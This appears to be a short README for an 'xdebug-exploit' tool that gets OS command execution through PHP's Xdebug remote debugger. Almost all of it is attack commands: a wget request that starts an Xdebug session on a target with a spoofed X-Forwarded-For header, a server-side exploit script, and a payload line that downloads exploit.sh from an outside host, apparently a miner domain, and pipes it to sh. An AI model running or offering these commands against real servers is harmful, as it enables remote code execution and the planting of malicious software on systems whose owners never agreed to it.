xdebug-exploit icon indicating copy to clipboard operation
xdebug-exploit copied to clipboard

OS Command Execution

xdebug-exploit

Client:

wget -q -O - 192.168.1.160/1.php?XDEBUG_SESSION_START=phpstorm --header 'X-Forwarded-For: 192.168.1.160'

Server:

./exploit_shell.py

system("wget -q -O - http://impudent.miner.com:8080/exploit.sh | sh");